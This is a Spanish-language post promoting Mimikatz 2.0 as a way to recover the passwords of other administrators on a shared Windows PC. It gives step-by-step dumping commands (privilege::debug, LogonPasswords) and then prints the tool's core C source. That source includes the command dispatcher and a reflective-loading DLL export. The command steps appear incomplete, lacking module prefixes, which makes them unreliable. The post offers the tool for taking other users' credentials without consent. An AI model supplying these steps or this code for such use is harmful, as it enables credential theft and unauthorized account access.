
Mimikatz 2.0
Descifra contraseñas en Windows
Mimikatz es un programa de un desarrollador francés apodado Gentil Kiwi que nos servirá para descifrar las contraseñas de los administradores de un PC con Windows, algo que puede ser muy útil cuando compartes un ordenador y no eres el único administrador.
Funcionamiento:
Ejecutamos Mimikatz como administrador.

Primero escribimos privilege::debug y presionamos Enter, después escribimos minidump y presionamos Enter, a continuación escribimos LogonPasswords y presionamos Enter y nos aparecerán la(s) contraseñas.

Código Fuente
mimikatz.c
Código:
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "mimikatz.h"
/* Module table. mimikatz_initOrClean walks it in index order to call each
 * entry's pInit / pClean, and mimikatz_doLocal searches it in the same order
 * by shortName. The first entry doubles as the default: a command line with
 * no "module::" prefix is resolved against kuhl_m_standard. kuhl_m_net is
 * only part of the table when NET_MODULE is defined at build time. */
const KUHL_M * mimikatz_modules[] = {
&kuhl_m_standard,
&kuhl_m_crypto,
&kuhl_m_sekurlsa,
&kuhl_m_kerberos,
&kuhl_m_privilege,
&kuhl_m_process,
&kuhl_m_service,
&kuhl_m_lsadump,
&kuhl_m_ts,
&kuhl_m_event,
&kuhl_m_misc,
&kuhl_m_token,
&kuhl_m_vault,
&kuhl_m_minesweeper,
#ifdef NET_MODULE
&kuhl_m_net,
#endif
&kuhl_m_dpapi,
};
/* Program entry point (also called by the DLL export under _WINDLL).
 * Prints the banner, runs every module's pInit, executes the commands given
 * as program arguments (from index MIMIKATZ_AUTO_COMMAND_START on) and, in
 * the console build, keeps reading command lines from stdin until a command
 * returns STATUS_FATAL_APP_EXIT. Module pClean hooks run before returning.
 * The per-command status only controls the loops; the function itself
 * always returns STATUS_SUCCESS. */
int wmain(int argc, wchar_t * argv[])
{
	int argIndex = MIMIKATZ_AUTO_COMMAND_START, status = STATUS_SUCCESS;
#ifndef _WINDLL
	wchar_t input[0xffff]; /* one command line, 0xffff wchar_t on the stack */
	size_t inputLen;

	kull_m_output_init();
	SetConsoleTitle(MIMIKATZ L" " MIMIKATZ_VERSION L" " MIMIKATZ_ARCH L" (oe.eo)");
	SetConsoleCtrlHandler(HandlerRoutine, TRUE);
#endif
	kprintf(L"\n"
		L" .#####. " MIMIKATZ_FULL L"\n"
		L" .## ^ ##. \n"
		L" ## / \\ ## /* * *\n"
		L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n"
		L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
		L" '#####' " MIMIKATZ_SPECIAL L" with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
	mimikatz_initOrClean(TRUE);

	/* Commands passed as arguments run first, in order; a fatal status from
	 * any of them skips the remaining ones and the interactive loop. */
	while((argIndex < argc) && (status != STATUS_FATAL_APP_EXIT))
	{
		kprintf(L"\n" MIMIKATZ L"(" MIMIKATZ_AUTO_COMMAND_STRING L") # %s\n", argv[argIndex]);
		status = mimikatz_dispatchCommand(argv[argIndex]);
		argIndex++;
	}
#ifndef _WINDLL
	/* Interactive loop: one command per line. A failed read or an empty line
	 * leaves status untouched, so the prompt is simply shown again. */
	while(status != STATUS_FATAL_APP_EXIT)
	{
		kprintf(L"\n" MIMIKATZ L" # ");
		fflush(stdin); /* MSVC CRT behaviour (discard pending input); ISO C leaves fflush on an input stream undefined */
		if(!fgetws(input, ARRAYSIZE(input), stdin))
			continue;
		inputLen = wcslen(input);
		if(!inputLen || (input[0] == L'\n'))
			continue;
		if(input[inputLen - 1] == L'\n')
			input[inputLen - 1] = L'\0';
		kprintf_inputline(L"%s\n", input);
		status = mimikatz_dispatchCommand(input);
	}
#endif
	mimikatz_initOrClean(FALSE);
#ifndef _WINDLL
	kull_m_output_clean();
#endif
	return STATUS_SUCCESS;
}
/* Console control handler registered by wmain. Whatever the event, it runs
 * the module cleanup hooks and returns FALSE so the next handler (by default
 * the one that terminates the process) still runs. */
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
{
	(void) dwCtrlType; /* every control event is handled the same way */
	mimikatz_initOrClean(FALSE);
	return FALSE;
}
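/* Runs the per-module lifecycle hooks: every module's pInit when Init is
 * TRUE, every module's pClean when it is FALSE. Init additionally records the
 * NT version numbers and starts the busylight; cleanup stops it and closes
 * the output file. A failing hook is reported on the console but does not
 * stop the loop, and the function always returns STATUS_SUCCESS.
 * The hook is selected by plain member access; the earlier version computed
 * FIELD_OFFSET(KUHL_M, pInit/pClean) and read the slot through a ULONG_PTR
 * cast, which is the same lookup without the type checking. */
NTSTATUS mimikatz_initOrClean(BOOL Init)
{
	unsigned short indexModule;
	const KUHL_M * module;
	PKUHL_M_C_FUNC_INIT hook;
	NTSTATUS hookStatus;

	if(Init)
	{
		RtlGetNtVersionNumbers(&MIMIKATZ_NT_MAJOR_VERSION, &MIMIKATZ_NT_MINOR_VERSION, &MIMIKATZ_NT_BUILD_NUMBER);
		MIMIKATZ_NT_BUILD_NUMBER &= 0x00003fff; /* keep the build number itself; the high bits presumably carry flags - verify against RtlGetNtVersionNumbers */
		kull_m_busylight_start();
	}

	for(indexModule = 0; indexModule < ARRAYSIZE(mimikatz_modules); indexModule++)
	{
		module = mimikatz_modules[indexModule];
		hook = Init ? module->pInit : module->pClean;
		if(!hook)
			continue; /* a module without this hook is simply skipped */
		hookStatus = hook();
		if(!NT_SUCCESS(hookStatus))
			kprintf(L">>> %s of \'%s\' module failed : %08x\n", (Init ? L"INIT" : L"CLEAN"), module->shortName, hookStatus);
	}

	if(!Init)
	{
		kull_m_busylight_stop();
		kull_m_output_file(NULL);
	}
	return STATUS_SUCCESS;
}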
/* Routes one command line: a leading '!' hands the rest of the line to
 * kuhl_m_kernel_do, anything else is parsed as "module::command" by
 * mimikatz_doLocal. Returns whatever the chosen handler returns. */
NTSTATUS mimikatz_dispatchCommand(wchar_t * input)
{
	if(input[0] == L'!')
		return kuhl_m_kernel_do(input + 1);
	return mimikatz_doLocal(input);
}
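/* Lists every registered module (shown when the requested module is unknown). */
static void mimikatz_printModules(void)
{
	unsigned short indexModule;

	for(indexModule = 0; indexModule < ARRAYSIZE(mimikatz_modules); indexModule++)
	{
		kprintf(L"\n%16s", mimikatz_modules[indexModule]->shortName);
		if(mimikatz_modules[indexModule]->fullName)
			kprintf(L" - %s", mimikatz_modules[indexModule]->fullName);
		if(mimikatz_modules[indexModule]->description)
			kprintf(L" [%s]", mimikatz_modules[indexModule]->description);
	}
	kprintf(L"\n");
}

/* Prints one module's header and every command it registers (shown when the
 * requested command is unknown or the line was just "module::"). */
static void mimikatz_printModuleCommands(const KUHL_M * module)
{
	unsigned short indexCommand;

	kprintf(L"\nModule :\t%s", module->shortName);
	if(module->fullName)
		kprintf(L"\nFull name :\t%s", module->fullName);
	if(module->description)
		kprintf(L"\nDescription :\t%s", module->description);
	kprintf(L"\n");
	for(indexCommand = 0; indexCommand < module->nbCommands; indexCommand++)
	{
		kprintf(L"\n%16s", module->commands[indexCommand].command);
		if(module->commands[indexCommand].description)
			kprintf(L" - %s", module->commands[indexCommand].description);
	}
	kprintf(L"\n");
}

/* Parses "module::command args..." and runs the matching module command.
 * argv[0] is split at the first "::"; without that separator the whole word
 * is looked up as a command of the first table entry (kuhl_m_standard).
 * Module and command names are compared case-insensitively. Unknown module
 * or command names print an error plus the available choices and leave the
 * status at STATUS_SUCCESS; otherwise the command's own status is returned.
 * Memory: argv comes from CommandLineToArgvW and the module name from
 * LocalAlloc; both are released here on every path (the earlier version
 * leaked argv when CommandLineToArgvW returned an array with argc == 0). */
NTSTATUS mimikatz_doLocal(wchar_t * input)
{
	NTSTATUS status = STATUS_SUCCESS;
	int argc;
	wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
	unsigned short indexModule, indexCommand;
	const KUHL_M * foundModule = NULL;
	BOOL commandFound = FALSE;

	if(argv && (argc > 0))
	{
		if(match = wcsstr(argv[0], L"::"))
		{
			/* LPTR zero-fills, so the extra element is the terminator */
			if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
			{
				if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
					command = match + 2; /* NULL when nothing follows "::" */
				RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
			}
			/* allocation failure leaves module and command NULL: the lookup
			 * then falls back to the first module and lists its commands */
		}
		else command = argv[0];

		/* a NULL module name matches the first entry of the table */
		for(indexModule = 0; !foundModule && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)
		{
			if(!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0))
				foundModule = mimikatz_modules[indexModule];
		}

		if(foundModule && command)
		{
			for(indexCommand = 0; !commandFound && (indexCommand < foundModule->nbCommands); indexCommand++)
			{
				if(_wcsicmp(command, foundModule->commands[indexCommand].command) == 0)
				{
					commandFound = TRUE;
					status = foundModule->commands[indexCommand].pCommand(argc - 1, argv + 1);
				}
			}
		}

		if(!foundModule)
		{
			PRINT_ERROR(L"\"%s\" module not found !\n", module);
			mimikatz_printModules();
		}
		else if(!commandFound)
		{
			PRINT_ERROR(L"\"%s\" command of \"%s\" module not found !\n", command, foundModule->shortName);
			mimikatz_printModuleCommands(foundModule);
		}
	}
	if(module)
		LocalFree(module);
	if(argv)
		LocalFree(argv);
	return status;
}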
#ifdef _WINDLL
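/* DLL export: runs one command line through wmain and hands back the text
 * collected in outputBuffer. outputBuffer, outputBufferElements and
 * outputBufferElementsPosition are the globals the output layer writes to;
 * they are reset here before each run. The buffer is sized for
 * outputBufferElements wchar_t - the earlier version passed the bare count
 * (0xff bytes) to LocalAlloc although the variable name says elements; the
 * consumer in the output layer is not visible here, and allocating per
 * element is safe under either interpretation.
 * If CommandLineToArgvW fails nothing runs and the global's current value is
 * returned unchanged; an allocation failure returns NULL. The returned buffer
 * is presumably released by the caller with LocalFree - confirm against the
 * loader that calls this export. */
__declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR input)
{
	int argc = 0;
	wchar_t ** argv = CommandLineToArgvW(input, &argc);

	if(argv)
	{
		outputBufferElements = 0xff;
		outputBufferElementsPosition = 0;
		outputBuffer = (wchar_t *) LocalAlloc(LPTR, outputBufferElements * sizeof(wchar_t));
		if(outputBuffer)
			wmain(argc, argv);
		LocalFree(argv);
	}
	return outputBuffer;
}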
#endif
Código:
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "modules/kuhl_m_standard.h"
#include "modules/kuhl_m_crypto.h"
#include "modules/sekurlsa/kuhl_m_sekurlsa.h"
#include "modules/kerberos/kuhl_m_kerberos.h"
#include "modules/kuhl_m_process.h"
#include "modules/kuhl_m_service.h"
#include "modules/kuhl_m_privilege.h"
#include "modules/kuhl_m_lsadump.h"
#include "modules/kuhl_m_ts.h"
#include "modules/kuhl_m_event.h"
#include "modules/kuhl_m_misc.h"
#include "modules/kuhl_m_token.h"
#include "modules/kuhl_m_vault.h"
#include "modules/kuhl_m_minesweeper.h"
#ifdef NET_MODULE
#include "modules/kuhl_m_net.h"
#endif
#include "modules/dpapi/kuhl_m_dpapi.h"
#include "modules/kuhl_m_kernel.h"
#include "../modules/kull_m_busylight.h"
#include <io.h>
#include <fcntl.h>
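/* Undocumented ntdll export returning the NT major/minor/build numbers;
 * mimikatz_initOrClean masks the build number with 0x00003fff. */
extern VOID WINAPI RtlGetNtVersionNumbers(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
/* Entry point: banner, module init, argument commands, interactive loop
 * (console build only), module cleanup. Always returns STATUS_SUCCESS. */
int wmain(int argc, wchar_t * argv[]);
/* Console control handler: runs module cleanup, then returns FALSE so the
 * next handler still runs. */
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
/* Runs every module's pInit (Init == TRUE) or pClean (Init == FALSE).
 * Declared with its parameter: the previous empty-parentheses form is an
 * unprototyped declaration and disabled argument checking at call sites. */
NTSTATUS mimikatz_initOrClean(BOOL Init);
/* Parses "module::command args..." and runs the matching module command;
 * unknown names print the available choices and return STATUS_SUCCESS. */
NTSTATUS mimikatz_doLocal(wchar_t * input);
/* Routes a line starting with '!' to kuhl_m_kernel_do, anything else to
 * mimikatz_doLocal. */
NTSTATUS mimikatz_dispatchCommand(wchar_t * input);
#ifdef _WINDLL
/* DLL export: runs input as one command line and returns the output
 * collected in outputBuffer (NULL if the buffer could not be allocated). */
__declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR input);
#endif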
